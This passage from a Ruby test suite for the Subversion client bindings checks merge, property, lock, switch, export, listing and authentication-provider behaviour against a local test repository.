[d.kind_normal?, d.kind_added?, d.kind_modified?, d.kind_deleted?]
end
assert_equal([[false, false, true, false]], kinds)
assert_equal([false], diffs.collect {|d| d.prop_changed?})
node_kinds = diffs.collect do |d|
[d.node_kind_none?, d.node_kind_file?,
d.node_kind_dir?, d.node_kind_unknown?]
end
assert_equal([[false, true, false, false]], node_kinds)
end
def assert_merge
log = "sample log"
file = "sample.txt"
src = "sample\n"
trunk = File.join(@wc_path, "trunk")
branch = File.join(@wc_path, "branch")
branch_relative_uri = "/branch"
branch_uri = "#{@repos_uri}#{branch_relative_uri}"
trunk_path = File.join(trunk, file)
trunk_path_uri = "#{@repos_uri}/trunk/#{file}"
branch_path = File.join(branch, file)
branch_path_relative_uri = "#{branch_relative_uri}/#{file}"
branch_path_uri = "#{@repos_uri}#{branch_path_relative_uri}"
ctx = make_context(log)
ctx.mkdir(trunk, branch)
File.open(trunk_path, "w") {}
File.open(branch_path, "w") {}
ctx.add(trunk_path)
ctx.add(branch_path)
rev1 = ctx.commit(@wc_path).revision
File.open(branch_path, "w") {|f| f.print(src)}
rev2 = ctx.commit(@wc_path).revision
merged_entries = []
ctx.log_merged(trunk, nil, branch_uri, nil) do |entry|
merged_entries << entry
end
assert_equal_log_entries([], merged_entries)
assert_nil(ctx.merged(trunk))
merged_entries = []
yield(ctx, branch, rev1, rev2, trunk)
ctx.log_merged(trunk, nil, branch_uri, nil) do |entry|
merged_entries << entry
end
assert_equal_log_entries([
[
{branch_path_relative_uri => ["M", nil, -1]},
rev2,
{
"svn:author" => @author,
"svn:log" => log,
},
false,
]
],
merged_entries)
mergeinfo = ctx.merged(trunk)
assert_not_nil(mergeinfo)
assert_equal([branch_uri], mergeinfo.keys)
ranges = mergeinfo[branch_uri].collect {|range| range.to_a}
assert_equal([[1, 2, true]], ranges)
rev3 = ctx.commit(@wc_path).revision
assert_equal(normalize_line_break(src), ctx.cat(trunk_path, rev3))
ctx.rm(branch_path)
rev4 = ctx.commit(@wc_path).revision
yield(ctx, branch, rev3, rev4, trunk)
assert(!File.exist?(trunk_path))
merged_entries = []
ctx.log_merged(trunk, rev4, branch_uri, rev4) do |entry|
merged_entries << entry
end
assert_equal_log_entries([
[
{branch_path_relative_uri => ["D", nil, -1]},
rev4,
{
"svn:author" => @author,
"svn:log" => log,
},
false,
]
] * 2, merged_entries)
ctx.propdel("svn:mergeinfo", trunk)
merged_entries = []
ctx.log_merged(trunk, rev4, branch_uri, rev4) do |entry|
merged_entries << entry
end
assert_equal_log_entries([], merged_entries)
ctx.revert(trunk)
ctx.revert(trunk_path)
File.open(trunk_path, "a") {|f| f.print(src)}
yield(ctx, branch, rev3, rev4, trunk)
rev5 = ctx.commit(@wc_path).revision
assert(File.exist?(trunk_path))
yield(ctx, branch, rev3, rev4, trunk, nil, false, true, true)
statuses = []
ctx.status(trunk) do |path, status|
statuses << status
end
assert_equal([], statuses)
yield(ctx, branch, rev3, rev4, trunk, nil, false, true)
statuses = []
ctx.status(trunk) do |path, status|
statuses << status
end
assert_not_equal([], statuses)
end
def test_merge
assert_merge do |ctx, from, from_rev1, from_rev2, to, *rest|
ctx.merge(from, from_rev1, from, from_rev2, to, *rest)
end
end
def test_merge_peg
assert_merge do |ctx, from, from_rev1, from_rev2, to, *rest|
ctx.merge_peg(from, from_rev1, from_rev2, to, nil, *rest)
end
end
def test_cleanup
log = "sample log"
file = "sample.txt"
src = "sample\n"
path = File.join(@wc_path, file)
ctx = make_context(log)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
rev = ctx.commit(@wc_path).revision
ctx.up(@wc_path, rev - 1)
File.open(path, "w") {|f| f.print(src)}
assert_raise(Svn::Error::WC_OBSTRUCTED_UPDATE) do
ctx.up(@wc_path, rev)
end
Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1) do |access|
assert_raise(Svn::Error::WC_LOCKED) do
ctx.commit(@wc_path)
end
end
ctx.set_cancel_func do
raise Svn::Error::CANCELLED
end
Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1) do |access|
assert_raise(Svn::Error::CANCELLED) do
ctx.cleanup(@wc_path)
end
assert_raise(Svn::Error::WC_LOCKED) do
ctx.commit(@wc_path)
end
end
ctx.set_cancel_func(nil)
access = Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1)
assert_nothing_raised do
ctx.cleanup(@wc_path)
end
assert_nothing_raised do
ctx.commit(@wc_path)
end
assert_raises(Svn::Error::SvnError) do
access.close
end
end
def test_relocate
log = "sample log"
file = "sample.txt"
src = "sample\n"
path = File.join(@wc_path, file)
ctx = make_context(log)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.commit(@wc_path)
assert_nothing_raised do
ctx.cat(path)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = @password
cred.may_save = true
end
ctx.relocate(@wc_path, @repos_uri, @repos_svnserve_uri)
ctx = make_context(log)
assert_raises(Svn::Error::AuthnNoProvider) do
ctx.cat(path)
end
end
def test_resolved
log = "sample log"
file = "sample.txt"
dir = "dir"
src1 = "before\n"
src2 = "after\n"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {}
ctx.add(path)
rev1 = ctx.ci(@wc_path).revision
File.open(path, "w") {|f| f.print(src1)}
rev2 = ctx.ci(@wc_path).revision
ctx.up(@wc_path, rev1)
File.open(path, "w") {|f| f.print(src2)}
ctx.up(@wc_path)
assert_raises(Svn::Error::WcFoundConflict) do
ctx.ci(@wc_path)
end
ctx.resolved(dir_path, false)
assert_raises(Svn::Error::WcFoundConflict) do
ctx.ci(@wc_path)
end
ctx.resolved(dir_path)
info = nil
assert_nothing_raised do
info = ctx.ci(@wc_path)
end
assert_not_nil(info)
assert_equal(rev2 + 1, info.revision)
end
def test_copy
log = "sample log"
src = "source\n"
file1 = "sample1.txt"
file2 = "sample2.txt"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src)}
ctx.add(path1)
ctx.ci(@wc_path)
ctx.cp(path1, path2)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
ctx.ci(@wc_path)
assert_equal([path2].sort,
infos.collect{|path, notify| path}.sort)
path2_notify = infos.assoc(path2)[1]
assert(path2_notify.commit_added?)
assert_equal(File.open(path1) {|f| f.read},
File.open(path2) {|f| f.read})
end
def test_move
log = "sample log"
src = "source\n"
file1 = "sample1.txt"
file2 = "sample2.txt"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src)}
ctx.add(path1)
ctx.ci(@wc_path)
ctx.mv(path1, path2)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
ctx.ci(@wc_path)
assert_equal([path1, path2].sort,
infos.collect{|path, notify| path}.sort)
path1_notify = infos.assoc(path1)[1]
assert(path1_notify.commit_deleted?)
path2_notify = infos.assoc(path2)[1]
assert(path2_notify.commit_added?)
assert_equal(src, File.open(path2) {|f| f.read})
end
def test_move_force
log = "sample log"
src1 = "source1\n"
src2 = "source2\n"
file1 = "sample1.txt"
file2 = "sample2.txt"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src1)}
ctx.add(path1)
ctx.ci(@wc_path)
File.open(path1, "w") {|f| f.print(src2)}
assert_nothing_raised do
ctx.mv(path1, path2)
end
ctx.revert([path1, path2])
FileUtils.rm(path2)
File.open(path1, "w") {|f| f.print(src2)}
assert_nothing_raised do
ctx.mv_f(path1, path2)
end
notifies = []
ctx.set_notify_func do |notify|
notifies << notify
end
ctx.ci(@wc_path)
paths = notifies.collect do |notify|
notify.path
end
assert_equal([path1, path2, path2].sort, paths.sort)
deleted_paths = notifies.find_all do |notify|
notify.commit_deleted?
end.collect do |notify|
notify.path
end
assert_equal([path1].sort, deleted_paths.sort)
added_paths = notifies.find_all do |notify|
notify.commit_added?
end.collect do |notify|
notify.path
end
assert_equal([path2].sort, added_paths.sort)
postfix_txdelta_paths = notifies.find_all do |notify|
notify.commit_postfix_txdelta?
end.collect do |notify|
notify.path
end
assert_equal([path2].sort, postfix_txdelta_paths.sort)
assert_equal(src2, File.open(path2) {|f| f.read})
end
def test_prop
log = "sample log"
dir = "dir"
file = "sample.txt"
dir_path = File.join(@wc_path, dir)
dir_uri = "#{@repos_uri}/#{dir}"
path = File.join(dir_path, file)
uri = "#{dir_uri}/#{file}"
prop_name = "sample-prop"
prop_value = "sample value"
invalid_mime_type_prop_value = "image"
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {}
ctx.add(path)
ctx.commit(@wc_path)
assert_equal({}, ctx.prop_get(prop_name, path))
ctx.prop_set(prop_name, prop_value, path)
ctx.commit(@wc_path)
assert_equal({uri => prop_value}, ctx.pget(prop_name, path))
ctx.prop_del(prop_name, path)
ctx.commit(@wc_path)
assert_equal({}, ctx.pg(prop_name, path))
ctx.ps(prop_name, prop_value, path)
ctx.commit(@wc_path)
assert_equal({uri => prop_value}, ctx.pg(prop_name, path))
ctx.ps(prop_name, nil, path)
ctx.commit(@wc_path)
assert_equal({}, ctx.pg(prop_name, path))
ctx.up(@wc_path)
ctx.ps(prop_name, prop_value, dir_path)
ctx.ci(@wc_path)
assert_equal({
dir_uri => prop_value,
uri => prop_value,
},
ctx.pg(prop_name, dir_path))
ctx.up(@wc_path)
ctx.pdel(prop_name, dir_path, false)
ctx.ci(@wc_path)
assert_equal({uri => prop_value}, ctx.pg(prop_name, dir_path))
ctx.up(@wc_path)
ctx.pd(prop_name, dir_path)
ctx.ci(@wc_path)
assert_equal({}, ctx.pg(prop_name, dir_path))
ctx.up(@wc_path)
ctx.ps(prop_name, prop_value, dir_path, false)
ctx.ci(@wc_path)
assert_equal({dir_uri => prop_value}, ctx.pg(prop_name, dir_path))
assert_raises(Svn::Error::BadMimeType) do
ctx.ps(Svn::Core::PROP_MIME_TYPE,
invalid_mime_type_prop_value,
path)
end
ctx.cleanup(@wc_path)
assert_nothing_raised do
ctx.ps(Svn::Core::PROP_MIME_TYPE,
invalid_mime_type_prop_value,
path, false, true)
end
ctx.commit(@wc_path)
assert_equal({uri => invalid_mime_type_prop_value},
ctx.pg(Svn::Core::PROP_MIME_TYPE, path))
end
def test_prop_list
log = "sample log"
dir = "dir"
file = "sample.txt"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
dir_uri = "#{@repos_uri}/#{dir}"
uri = "#{dir_uri}/#{file}"
name1 = "name1"
name2 = "name2"
value1 = "value1"
value2 = "value2"
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {}
ctx.add(path)
ctx.ci(@wc_path)
assert_equal([], ctx.prop_list(path))
ctx.ps(name1, value1, path)
ctx.ci(@wc_path)
assert_equal([uri], ctx.prop_list(path).collect{|item| item.node_name})
assert_equal([{name1 => value1}],
ctx.plist(path).collect{|item| item.prop_hash})
assert_equal([value1], ctx.pl(path).collect{|item| item[name1]})
ctx.up(@wc_path)
ctx.ps(name2, value2, dir_path)
ctx.ci(@wc_path)
assert_equal([uri, dir_uri].sort,
ctx.prop_list(dir_path).collect{|item| item.name})
prop_list = ctx.plist(dir_path).collect{|item| [item.name, item.props]}
props = prop_list.assoc(uri)[1]
dir_props = prop_list.assoc(dir_uri)[1]
assert_equal({name1 => value1, name2 => value2}, props)
assert_equal({name2 => value2}, dir_props)
end
def recurse_and_depth_choices
[false, true, 'empty', 'files', 'immediates', 'infinity']
end
def test_file_prop
setup_greek_tree
log = "sample log"
ctx = make_context(log)
# when no props set, everything is empty
recurse_and_depth_choices.each do |rd|
assert_equal([],
ctx.prop_list(@greek.path(:mu), nil, nil, rd),
"prop_list with Depth '#{rd}'")
end
recurse_and_depth_choices.each do |rd|
assert_equal({},
ctx.prop_get(rd.to_s, @greek.path(:mu), nil, nil, rd),
"prop_get with Depth '#{rd}'")
end
# set some props
recurse_and_depth_choices.each do |rd|
ctx.prop_set(rd.to_s, rd.to_s, @greek.path(:mu), rd)
end
ctx.commit(@greek.path(:mu))
# get the props
recurse_and_depth_choices.each do |rd|
assert_equal({@greek.uri(:mu) => rd.to_s},
ctx.prop_get(rd.to_s, @greek.path(:mu), nil, nil, rd),
"prop_get with Depth '#{rd}'")
end
prop_hash = {}
recurse_and_depth_choices.each {|rd| prop_hash[rd.to_s] = rd.to_s}
# list the props
recurse_and_depth_choices.each do |rd|
props = ctx.prop_list(@greek.path(:mu), nil, nil, rd)
assert_equal([@greek.uri(:mu)],
props.collect {|item| item.node_name},
"prop_list (node_name) with Depth '#{rd}'")
props = ctx.plist(@greek.path(:mu), nil, nil, rd)
assert_equal([prop_hash],
props.collect {|item| item.prop_hash},
"prop_list (prop_hash) with Depth '#{rd}'")
recurse_and_depth_choices.each do |rd1|
props = ctx.plist(@greek.path(:mu), nil, nil, rd)
assert_equal([rd1.to_s],
props.collect {|item| item[rd1.to_s]},
"prop_list (#{rd1.to_s}]) with Depth '#{rd}'")
end
end
end
def test_dir_prop
setup_greek_tree
log = "sample log"
ctx = make_context(log)
# when no props set, everything is empty
recurse_and_depth_choices.each do |rd|
assert_equal([],
ctx.prop_list(@greek.path(:b), nil, nil, rd),
"prop_list with Depth '#{rd}'")
end
recurse_and_depth_choices.each do |rd|
assert_equal({},
ctx.prop_get(rd.to_s, @greek.path(:b), nil, nil, rd),
"prop_get with Depth '#{rd}'")
end
# set some props with various depths
recurse_and_depth_choices.each do |rd|
ctx.prop_set(rd.to_s, rd.to_s, @greek.path(:b), rd)
end
ctx.commit(@greek.path(:b))
expected_props = {
true => [:beta, :b, :lambda, :e, :f, :alpha],
false => [:b],
'empty' => [:b],
'files' => [:b, :lambda],
'immediates' => [:b, :lambda, :e, :f],
'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
}
paths = [:b, :e, :alpha, :beta, :f, :lambda]
# how are the props set?
recurse_and_depth_choices.each do |rd|
paths.each do |path|
if expected_props[rd].include?(path)
expected = {@greek.uri(path) => rd.to_s}
else
expected = {}
end
assert_equal(expected,
ctx.prop_get(rd.to_s, @greek.path(path), nil, nil, false),
"prop_get #{@greek.resolve(path)} with Depth '#{rd}'")
end
end
recurse_and_depth_choices.each do |rd_for_prop|
recurse_and_depth_choices.each do |rd_for_depth|
expected = {}
expected_paths = expected_props[rd_for_depth]
expected_paths &= expected_props[rd_for_prop]
expected_paths.each do |path|
expected[@greek.uri(path)] = rd_for_prop.to_s
end
assert_equal(expected,
ctx.prop_get(rd_for_prop.to_s, @greek.path(:b),
nil, nil, rd_for_depth),
"prop_get '#{rd_for_prop}' with Depth '#{rd_for_depth}'")
end
end
recurse_and_depth_choices.each do |rd|
props = ctx.prop_list(@greek.path(:b), nil, nil, rd)
assert_equal(expected_props[rd].collect {|path| @greek.uri(path)}.sort,
props.collect {|item| item.node_name}.sort,
"prop_list (node_name) with Depth '#{rd}'")
end
end
def test_cat
log = "sample log"
src1 = "source1\n"
src2 = "source2\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src1)}
ctx = make_context(log)
ctx.add(path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
assert_equal(normalize_line_break(src1), ctx.cat(path, rev1))
assert_equal(normalize_line_break(src1), ctx.cat(path))
File.open(path, "w") {|f| f.print(src2)}
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
assert_equal(normalize_line_break(src1), ctx.cat(path, rev1))
assert_equal(normalize_line_break(src2), ctx.cat(path, rev2))
assert_equal(normalize_line_break(src2), ctx.cat(path))
end
def test_lock
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
ctx.commit(@wc_path)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
ctx.lock(path)
assert_equal([file], infos.collect{|path, notify| path})
file_notify = infos.assoc(file)[1]
assert(file_notify.locked?)
end
def test_unlock
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
ctx.commit(@wc_path)
ctx.lock(path)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
ctx.unlock(path)
assert_equal([file], infos.collect{|path, notify| path})
file_notify = infos.assoc(file)[1]
assert(file_notify.unlocked?)
end
def test_info
log = "sample log"
ctx = make_context(log)
repos_base = File.basename(@repos_path)
infos = []
ctx.info(@wc_path) do |path, info|
infos << [path, info]
end
assert_equal([repos_base],
infos.collect{|path, info| path})
top_info = infos.assoc(repos_base)[1]
assert_equal(@repos_uri, top_info.url)
end
def test_info_with_depth
setup_greek_tree
log = "sample log"
ctx = make_context(log)
recurse_and_depth_choices.each do |rd|
ctx.info(@greek.path(:mu),nil,nil,rd) do |path, info|
assert_equal @greek.uri(:mu), info.URL
end
end
expected_info_by_depth = {
true => [:beta, :b, :lambda, :e, :f, :alpha],
false => [:b],
'empty' => [:b],
'files' => [:b, :lambda],
'immediates' => [:b, :lambda, :e, :f],
'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
}
recurse_and_depth_choices.each do |rd|
urls = []
ctx.info(@greek.path(:b),nil,nil,rd) do |path, info|
urls << info.URL
end
assert_equal expected_info_by_depth[rd].map{|s| @greek.uri(s)}.sort,
urls.sort,
"depth '#{rd}"
end
end
def test_url_from_path
log = "sample log"
ctx = make_context(log)
assert_equal(@repos_uri, ctx.url_from_path(@wc_path))
assert_equal(@repos_uri, Svn::Client.url_from_path(@wc_path))
end
def test_uuid
log = "sample log"
ctx = make_context(log)
Svn::Wc::AdmAccess.open(nil, @wc_path, false, 0) do |adm|
assert_equal(ctx.uuid_from_url(@repos_uri),
ctx.uuid_from_path(@wc_path, adm))
end
end
def test_open_ra_session
log = "sample log"
ctx = make_context(log)
assert_instance_of(Svn::Ra::Session, ctx.open_ra_session(@repos_uri))
end
def test_revprop
log = "sample log"
new_log = "new sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
info = ctx.commit(@wc_path)
assert_equal([
{
Svn::Core::PROP_REVISION_AUTHOR => @author,
Svn::Core::PROP_REVISION_DATE => info.date,
Svn::Core::PROP_REVISION_LOG => log,
},
info.revision
],
ctx.revprop_list(@repos_uri, info.revision))
assert_equal([log, info.revision],
ctx.revprop_get(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(log,
ctx.revprop(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(info.revision,
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
@repos_uri, info.revision))
assert_equal([new_log, info.revision],
ctx.rpget(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(new_log,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal([
{
Svn::Core::PROP_REVISION_AUTHOR => @author,
Svn::Core::PROP_REVISION_DATE => info.date,
Svn::Core::PROP_REVISION_LOG => new_log,
},
info.revision
],
ctx.rplist(@repos_uri, info.revision))
assert_equal(info.revision,
ctx.revprop_del(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal([nil, info.revision],
ctx.rpg(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(nil,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(info.revision,
ctx.rpset(Svn::Core::PROP_REVISION_LOG, new_log,
@repos_uri, info.revision))
assert_equal(new_log,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(info.revision,
ctx.rps(Svn::Core::PROP_REVISION_LOG, nil,
@repos_uri, info.revision))
assert_equal(nil,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal([
{
Svn::Core::PROP_REVISION_AUTHOR => @author,
Svn::Core::PROP_REVISION_DATE => info.date,
},
info.revision
],
ctx.rpl(@repos_uri, info.revision))
end
def test_export
log = "sample log"
src = "source\n"
file = "sample.txt"
dir = "sample"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
tmp_base_path = File.join(@tmp_path, "tmp")
tmp_dir_path = File.join(tmp_base_path, dir)
tmp_path = File.join(tmp_dir_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
rev = ctx.ci(@wc_path).revision
assert_equal(rev, ctx.export(@repos_uri, tmp_base_path))
assert_equal(src, File.open(tmp_path) {|f| f.read})
end
def test_ls
log = "sample log"
src = "source\n"
file = "sample.txt"
dir = "sample"
dir_path = File.join(@wc_path, dir)
path = File.join(@wc_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
rev = ctx.ci(@wc_path).revision
dirents, locks = ctx.ls(@wc_path, rev)
assert_equal([dir, file].sort, dirents.keys.sort)
dir_dirent = dirents[dir]
assert(dir_dirent.directory?)
file_dirent = dirents[file]
assert(file_dirent.file?)
end
def test_list
log = "sample log"
src = "source\n"
file = "sample.txt"
dir = "sample"
prop_name = "sample-prop"
prop_value = "sample value"
dir_path = File.join(@wc_path, dir)
path = File.join(@wc_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.prop_set(prop_name, prop_value, path)
rev = ctx.ci(@wc_path).revision
entries = []
ctx.list(@wc_path, rev) do |path, dirent, lock, abs_path|
entries << [path, dirent, lock, abs_path]
end
paths = entries.collect do |path, dirent, lock, abs_path|
[path, abs_path]
end
assert_equal([["", "/"], [dir, "/"], [file, "/"]].sort, paths.sort)
entries.each do |path, dirent, lock, abs_path|
case path
when dir, ""
assert(dirent.directory?)
assert_false(dirent.have_props?)
when file
assert(dirent.file?)
assert_true(dirent.have_props?)
else
flunk
end
end
end
def test_list_with_depth
setup_greek_tree
log = "sample log"
ctx = make_context(log)
expected_lists_by_depth = {
true => [:beta, :b, :lambda, :e, :f, :alpha],
false => [:b, :lambda, :e, :f],
'empty' => [:b],
'files' => [:b, :lambda],
'immediates' => [:b, :lambda, :e, :f],
'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
}
recurse_and_depth_choices.each do |rd|
paths = []
ctx.list(@greek.path(:b), 'head' ,nil, rd) do |path, dirent, lock, abs_path|
paths << (path.empty? ? abs_path : File.join(abs_path, path))
end
assert_equal(expected_lists_by_depth[rd].map{|s| "/#{@greek.resolve(s)}"}.sort,
paths.sort,
"depth '#{rd}")
end
end
def test_switch
log = "sample log"
trunk_src = "trunk source\n"
tag_src = "tag source\n"
file = "sample.txt"
file = "sample.txt"
trunk_dir = "trunk"
tag_dir = "tags"
tag_name = "0.0.1"
trunk_repos_uri = "#{@repos_uri}/#{trunk_dir}"
tag_repos_uri = "#{@repos_uri}/#{tag_dir}/#{tag_name}"
trunk_dir_path = File.join(@wc_path, trunk_dir)
tag_dir_path = File.join(@wc_path, tag_dir)
tag_name_dir_path = File.join(@wc_path, tag_dir, tag_name)
trunk_path = File.join(trunk_dir_path, file)
tag_path = File.join(tag_name_dir_path, file)
path = File.join(@wc_path, file)
ctx = make_context(log)
ctx.mkdir(trunk_dir_path)
File.open(trunk_path, "w") {|f| f.print(trunk_src)}
ctx.add(trunk_path)
trunk_rev = ctx.commit(@wc_path).revision
ctx.mkdir(tag_dir_path, tag_name_dir_path)
File.open(tag_path, "w") {|f| f.print(tag_src)}
ctx.add(tag_path)
tag_rev = ctx.commit(@wc_path).revision
assert_equal(youngest_rev, ctx.switch(@wc_path, trunk_repos_uri))
assert_equal(normalize_line_break(trunk_src), ctx.cat(path))
assert_equal(youngest_rev, ctx.switch(@wc_path, tag_repos_uri))
assert_equal(normalize_line_break(tag_src), ctx.cat(path))
notify_info = []
ctx.set_notify_func do |notify|
notify_info << [notify.path, notify.action]
end
assert_equal(trunk_rev, ctx.switch(@wc_path, trunk_repos_uri, trunk_rev))
assert_equal(normalize_line_break(trunk_src), ctx.cat(path))
assert_equal([
[path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
[@wc_path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
[@wc_path, Svn::Wc::NOTIFY_UPDATE_COMPLETED],
],
notify_info)
notify_info.clear
assert_equal(tag_rev, ctx.switch(@wc_path, tag_repos_uri, tag_rev))
assert_equal(normalize_line_break(tag_src), ctx.cat(path))
assert_equal([
[path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
[@wc_path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
[@wc_path, Svn::Wc::NOTIFY_UPDATE_COMPLETED],
],
notify_info)
end
def test_authentication
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
svnserve_uri = "#{@repos_svnserve_uri}/#{file}"
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
ctx.commit(@wc_path)
ctx = Svn::Client::Context.new
assert_raises(Svn::Error::AuthnNoProvider) do
ctx.cat(svnserve_uri)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = "wrong-#{@author}"
cred.password = @password
cred.may_save = false
end
assert_raises(Svn::Error::RaNotAuthorized) do
ctx.cat(svnserve_uri)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = "wrong-#{@password}"
cred.may_save = false
end
assert_raises(Svn::Error::RaNotAuthorized) do
ctx.cat(svnserve_uri)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = @password
cred.may_save = false
end
assert_equal(normalize_line_break(src), ctx.cat(svnserve_uri))
end
def assert_simple_provider(method)
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
svnserve_uri = "#{@repos_svnserve_uri}/#{file}"
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
setup_auth_baton(ctx.auth_baton)
ctx.add(path)
ctx.commit(@wc_path)
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.send(method)
assert_raises(Svn::Error::RaNotAuthorized) do
ctx.cat(svnserve_uri)
end
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.send(method)
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = @password
end
assert_equal(normalize_line_break(src), ctx.cat(svnserve_uri))
end
def test_simple_provider
assert_simple_provider(:add_simple_provider)
end
if Svn::Core.respond_to?(:auth_get_windows_simple_provider)
def test_windows_simple_provider
assert_simple_provider(:add_windows_simple_provider)
end
end
if Svn::Core.respond_to?(:auth_get_keychain_simple_provider)
def test_keychain_simple_provider
assert_simple_provider(:add_keychain_simple_provider)
end
end
def test_username_provider
log = "sample log"
new_log = "sample new log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
repos_uri = "#{@repos_uri}/#{file}"
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
info = ctx.commit(@wc_path)
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = @author
ctx.add_username_provider
assert_nothing_raised do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = "#{@author}-NG"
ctx.add_username_provider
assert_raise(Svn::Error::REPOS_HOOK_FAILURE) do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = nil
ctx.add_username_prompt_provider(0) do |cred, realm, may_save|
end
assert_raise(Svn::Error::REPOS_HOOK_FAILURE) do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = nil
ctx.add_username_prompt_provider(0) do |cred, realm, may_save|
cred.username = @author
end
assert_nothing_raised do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
end
def test_add_providers
ctx = Svn::Client::Context.new
assert_nothing_raised do
ctx.add_ssl_client_cert_file_provider
ctx.add_ssl_client_cert_pw_file_provider
ctx.add_ssl_server_trust_file_provider
if Svn::Core.respond_to?(:auth_get_windows_ssl_server_trust_provider)
ctx.add_windows_ssl_server_trust_provider
end
end
end
def test_commit_item
assert_raise(NoMethodError) do
Svn::Client::CommitItem.new
end
assert_raise(NoMethodError) do
Svn::Client::CommitItem2.new
end
item = Svn::Client::CommitItem3.new
assert_kind_of(Svn::Client::CommitItem3, item)
url = "xxx"
item.url = url
assert_equal(url, item.dup.url)
end
def test_log_msg_func_commit_items
log = "sample log"
file = "file"
file2 = "file2"
src = "source"
path = File.join(@wc_path, file)
repos_uri2 = "#{@repos_uri}/#{file2}"
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
items = nil
ctx.set_log_msg_func do |items|
[true, log]
end
ctx.add(path)
